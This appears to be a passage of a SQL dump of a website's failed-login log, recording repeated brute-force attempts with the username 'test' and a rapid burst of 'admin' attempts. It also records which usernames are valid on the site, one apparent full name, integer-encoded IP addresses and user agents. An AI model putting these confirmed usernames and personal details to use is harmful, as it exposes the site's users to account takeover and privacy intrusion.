(98935, 1492334559.664208, 1, 'loginFailInvalidUsername', 'test', 0, 763203023, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98934, 1492334557.391679, 1, 'loginFailInvalidUsername', 'test', 0, 763203023, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98933, 1492329074.483295, 1, 'loginFailInvalidUsername', 'test', 0, 1394319284, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98932, 1492329073.299996, 1, 'loginFailInvalidUsername', 'test', 0, 1394319284, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98931, 1492327647.031546, 1, 'loginFailInvalidUsername', 'test', 0, 2057822968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98930, 1492327306.491397, 1, 'loginFailValidUsername', 'julie', 2, 3563927549, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98929, 1492326514.319933, 1, 'loginFailInvalidUsername', 'test', 0, 609307862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98928, 1492326511.969168, 1, 'loginFailInvalidUsername', 'test', 0, 609307862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98927, 1492323165.226090, 1, 'loginFailInvalidUsername', 'test', 0, 657201404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98926, 1492323164.042124, 1, 'loginFailInvalidUsername', 'test', 0, 657201404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98925, 1492322734.487120, 1, 'loginFailInvalidUsername', 'test', 0, 2344738454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98924, 1492322731.194180, 1, 'loginFailInvalidUsername', 'test', 0, 2344738454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98923, 1492321361.309771, 1, 'loginFailInvalidUsername', 'test', 0, 3758090141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98922, 1492321357.367115, 1, 'loginFailInvalidUsername', 'test', 0, 3758090141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98921, 1492309119.270306, 1, 'loginFailInvalidUsername', 'test', 0, 621540623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98920, 1492309118.270323, 1, 'loginFailInvalidUsername', 'test', 0, 621540623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98919, 1492308284.873251, 1, 'loginFailInvalidUsername', 'test', 0, 1855915268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98918, 1492305048.821953, 1, 'loginFailInvalidUsername', 'test', 0, 2630993580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98917, 1492304960.854997, 1, 'loginFailValidUsername', 'admin', 1, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98916, 1492303753.312155, 1, 'loginFailInvalidUsername', 'test', 0, 3373670976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98915, 1492303750.654144, 1, 'loginFailInvalidUsername', 'test', 0, 3373670976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98914, 1492302962.925886, 1, 'loginFailInvalidUsername', 'test', 0, 3557016176, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98913, 1492302919.053190, 1, 'loginFailInvalidUsername', 'test', 0, 608990115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98912, 1492299288.297749, 1, 'loginFailValidUsername', 'julie', 2, 2972118172, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98911, 1492298444.941240, 1, 'loginFailInvalidUsername', 'test', 0, 3254738604, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98910, 1492293664.777192, 1, 'loginFailInvalidUsername', 'test', 0, 1834854232, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98909, 1492291822.755137, 1, 'loginFailInvalidUsername', 'test', 0, 1855916338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98908, 1492291821.225611, 1, 'loginFailInvalidUsername', 'test', 0, 1855916338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98907, 1492290916.783731, 1, 'loginFailValidUsername', 'julie', 2, 701685514, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98906, 1492289837.864461, 1, 'loginFailInvalidUsername', 'test', 0, 2982770167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98905, 1492289836.392317, 1, 'loginFailInvalidUsername', 'test', 0, 2982770167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98904, 1492287181.714249, 1, 'loginFailInvalidUsername', 'test', 0, 3220751526, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98903, 1492287180.158312, 1, 'loginFailInvalidUsername', 'test', 0, 3220751526, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98902, 1492283991.514840, 1, 'loginFailInvalidUsername', 'test', 0, 975420267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98901, 1492283990.239210, 1, 'loginFailInvalidUsername', 'test', 0, 1144739235, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98900, 1492283989.929363, 1, 'loginFailInvalidUsername', 'test', 0, 975420267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98899, 1492282328.823146, 1, 'loginFailInvalidUsername', 'test', 0, 1530413649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98898, 1492282327.858183, 1, 'loginFailInvalidUsername', 'test', 0, 1530413649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98897, 1492278332.739840, 1, 'loginFailInvalidUsername', 'test', 0, 1308789018, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98896, 1492278331.694138, 1, 'loginFailInvalidUsername', 'test', 0, 1308789018, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98895, 1492278060.482049, 1, 'loginFailInvalidUsername', 'test', 0, 1566033713, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98894, 1492278059.400073, 1, 'loginFailInvalidUsername', 'test', 0, 1566033713, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98893, 1492276825.240910, 1, 'loginFailValidUsername', 'julie', 2, 3188441888, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98892, 1492276725.871034, 1, 'loginFailInvalidUsername', 'test', 0, 3038501773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98891, 1492276724.320191, 1, 'loginFailInvalidUsername', 'test', 0, 3038501773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98890, 1492274349.257916, 1, 'loginFailInvalidUsername', 'test', 0, 3013559536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98889, 1492274347.899992, 1, 'loginFailInvalidUsername', 'test', 0, 3013559536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98888, 1492273470.881755, 1, 'loginFailInvalidUsername', 'test', 0, 3159534844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98887, 1492273469.828569, 1, 'loginFailInvalidUsername', 'test', 0, 3159534844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98886, 1492272333.757682, 1, 'loginFailInvalidUsername', 'test', 0, 838336850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98885, 1492270168.067552, 1, 'loginFailInvalidUsername', 'test', 0, 693240076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98884, 1492270166.773944, 1, 'loginFailInvalidUsername', 'test', 0, 693240076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98883, 1492268127.760220, 1, 'loginFailInvalidUsername', 'test', 0, 1475493306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98882, 1492268126.505945, 1, 'loginFailInvalidUsername', 'test', 0, 1475493306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98881, 1492265535.356803, 1, 'loginFailValidUsername', 'julie', 2, 2972118060, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98880, 1492265513.620101, 1, 'loginFailInvalidUsername', 'test', 0, 1088380223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98879, 1492265512.479536, 1, 'loginFailInvalidUsername', 'test', 0, 1088380223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98878, 1492260569.526394, 1, 'loginFailInvalidUsername', 'test', 0, 3196614282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98877, 1492260567.974142, 1, 'loginFailInvalidUsername', 'test', 0, 3196614282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98876, 1492258132.026364, 1, 'loginFailInvalidUsername', 'test', 0, 3536047280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98875, 1492257494.202374, 1, 'loginFailInvalidUsername', 'test', 0, 1009997910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98874, 1492257492.676230, 1, 'loginFailInvalidUsername', 'test', 0, 1009997910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98873, 1492257011.159197, 1, 'loginFailValidUsername', 'julie', 2, 1600653116, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98872, 1492254571.061870, 1, 'loginFailInvalidUsername', 'test', 0, 3579648115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98871, 1492254570.084851, 1, 'loginFailInvalidUsername', 'test', 0, 3579648115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98870, 1492250286.088688, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98869, 1492250285.768727, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98868, 1492250285.450959, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98867, 1492250285.126001, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98866, 1492250284.807976, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98865, 1492250284.490596, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98864, 1492250284.038135, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98863, 1492250283.719609, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98862, 1492250283.388906, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98861, 1492250283.068746, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98860, 1492250282.744930, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98859, 1492250282.427928, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98858, 1492250282.098288, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98857, 1492250281.779129, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98856, 1492250281.462600, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98855, 1492250281.132210, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98854, 1492250280.814488, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98853, 1492250280.497488, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98852, 1492250280.160287, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98851, 1492247844.706343, 1, 'loginFailInvalidUsername', 'test', 0, 2995770117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98850, 1492247843.630841, 1, 'loginFailInvalidUsername', 'test', 0, 2995770117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98849, 1492247036.080855, 1, 'loginFailInvalidUsername', 'test', 0, 1394350159, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98848, 1492246715.130247, 1, 'loginFailInvalidUsername', 'test', 0, 1915728785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98847, 1492245875.161983, 1, 'loginFailInvalidUsername', 'test', 0, 1856813194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98846, 1492245873.766201, 1, 'loginFailInvalidUsername', 'test', 0, 1856813194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98845, 1492242029.194710, 1, 'loginFailInvalidUsername', 'test', 0, 1976128136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98844, 1492242027.320010, 1, 'loginFailInvalidUsername', 'test', 0, 1976128136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98843, 1492241584.250370, 1, 'loginFailInvalidUsername', 'test', 0, 632688120, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98842, 1492241582.968622, 1, 'loginFailInvalidUsername', 'test', 0, 632688120, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98841, 1492241073.998662, 1, 'loginFailInvalidUsername', 'test', 0, 850036190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98840, 1492240160.914198, 1, 'loginFailInvalidUsername', 'test', 0, 1010931693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98839, 1492238861.207858, 1, 'loginFailInvalidUsername', 'test', 0, 3564505322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98838, 1492238859.955408, 1, 'loginFailInvalidUsername', 'test', 0, 3564505322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98837, 1492238517.482760, 1, 'loginFailInvalidUsername', 'test', 0, 696802273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98836, 1492238516.164331, 1, 'loginFailInvalidUsername', 'test', 0, 696802273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98835, 1492237927.258805, 1, 'loginFailInvalidUsername', 'test', 0, 1209671474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98834, 1492237922.395152, 1, 'loginFailInvalidUsername', 'test', 0, 1209671474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98833, 1492234737.739405, 1, 'loginFailInvalidUsername', 'test', 0, 1729428867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98832, 1492234735.875219, 1, 'loginFailInvalidUsername', 'test', 0, 1729428867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98831, 1492228391.374464, 1, 'loginFailInvalidUsername', 'test', 0, 3140082908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98830, 1492228390.057935, 1, 'loginFailInvalidUsername', 'test', 0, 3140082908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98829, 1492228156.472600, 1, 'loginFailInvalidUsername', 'test', 0, 1977594621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98828, 1492228154.965751, 1, 'loginFailInvalidUsername', 'test', 0, 1977594621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98827, 1492224983.658856, 1, 'loginFailInvalidUsername', 'test', 0, 2346226121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98826, 1492224981.581134, 1, 'loginFailInvalidUsername', 'test', 0, 2346226121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98825, 1492223966.549924, 1, 'loginFailInvalidUsername', 'test', 0, 1224503857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98824, 1492216040.850791, 1, 'loginFailInvalidUsername', 'test', 0, 3157539414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98823, 1492215627.051438, 1, 'loginFailInvalidUsername', 'test', 0, 692429882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98822, 1492213385.456474, 1, 'loginFailInvalidUsername', 'test', 0, 3288449025, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98821, 1492213382.445135, 1, 'loginFailInvalidUsername', 'test', 0, 3288449025, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98820, 1492212765.519643, 1, 'loginFailInvalidUsername', 'test', 0, 1336437487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98819, 1492211993.109071, 1, 'loginFailInvalidUsername', 'test', 0, 1876519548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98818, 1492211323.325901, 1, 'loginFailInvalidUsername', 'test', 0, 792112870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98817, 1492207329.077796, 1, 'loginFailInvalidUsername', 'test', 0, 2561393884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98816, 1492207327.525904, 1, 'loginFailInvalidUsername', 'test', 0, 2561393884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98815, 1492207229.684242, 1, 'loginFailInvalidUsername', 'test', 0, 1730824995, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98814, 1492207228.441633, 1, 'loginFailInvalidUsername', 'test', 0, 1730824995, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98813, 1492205910.471992, 1, 'loginFailInvalidUsername', 'test', 0, 3202927877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98812, 1492205909.197366, 1, 'loginFailInvalidUsername', 'test', 0, 3202927877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98811, 1492202027.535322, 1, 'loginFailInvalidUsername', 'test', 0, 3375320393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98810, 1492202026.036576, 1, 'loginFailInvalidUsername', 'test', 0, 3375320393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98809, 1492201666.252201, 1, 'loginFailInvalidUsername', 'test', 0, 1295372723, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98808, 1492200267.266750, 1, 'loginFailInvalidUsername', 'test', 0, 1380764866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98807, 1492200216.303752, 1, 'loginFailInvalidUsername', 'test', 0, 843754294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98806, 1492196578.492756, 1, 'loginFailInvalidUsername', 'test', 0, 17393349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98805, 1492196576.892755, 1, 'loginFailInvalidUsername', 'test', 0, 17393349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98804, 1492193103.591561, 1, 'loginFailInvalidUsername', 'test', 0, 3576773627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98803, 1492193102.519859, 1, 'loginFailInvalidUsername', 'test', 0, 3576773627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98802, 1492191768.971430, 1, 'loginFailInvalidUsername', 'test', 0, 2001500915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98801, 1492191766.797997, 1, 'loginFailInvalidUsername', 'test', 0, 2001500915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98800, 1492189307.137756, 1, 'loginFailInvalidUsername', 'test', 0, 831866499, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98799, 1492189305.365727, 1, 'loginFailInvalidUsername', 'test', 0, 831866499, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98798, 1492189288.288678, 1, 'loginFailInvalidUsername', 'test', 0, 1976279672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98797, 1492189286.504656, 1, 'loginFailInvalidUsername', 'test', 0, 1976279672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98796, 1492185839.281331, 1, 'loginFailInvalidUsername', 'test', 0, 1781731329, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98795, 1492181889.798329, 1, 'loginFailInvalidUsername', 'test', 0, 2006575746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98794, 1492181888.476784, 1, 'loginFailInvalidUsername', 'test', 0, 2006575746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98793, 1492180363.396289, 1, 'loginFailInvalidUsername', 'test', 0, 1333705792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98792, 1492170952.315249, 1, 'loginFailInvalidUsername', 'test', 0, 2030499101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98791, 1492170950.669060, 1, 'loginFailInvalidUsername', 'test', 0, 2030499101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98790, 1492170565.990585, 1, 'loginFailInvalidUsername', 'test', 0, 2057623110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98789, 1492170564.631821, 1, 'loginFailInvalidUsername', 'test', 0, 2057623110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98788, 1492167562.659095, 1, 'loginFailValidUsername', 'admin', 1, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98787, 1492167561.961929, 1, 'loginFailValidUsername', 'pablo', 3, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98786, 1492167561.306965, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98785, 1492167560.664184, 1, 'loginFailValidUsername', 'julie', 2, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
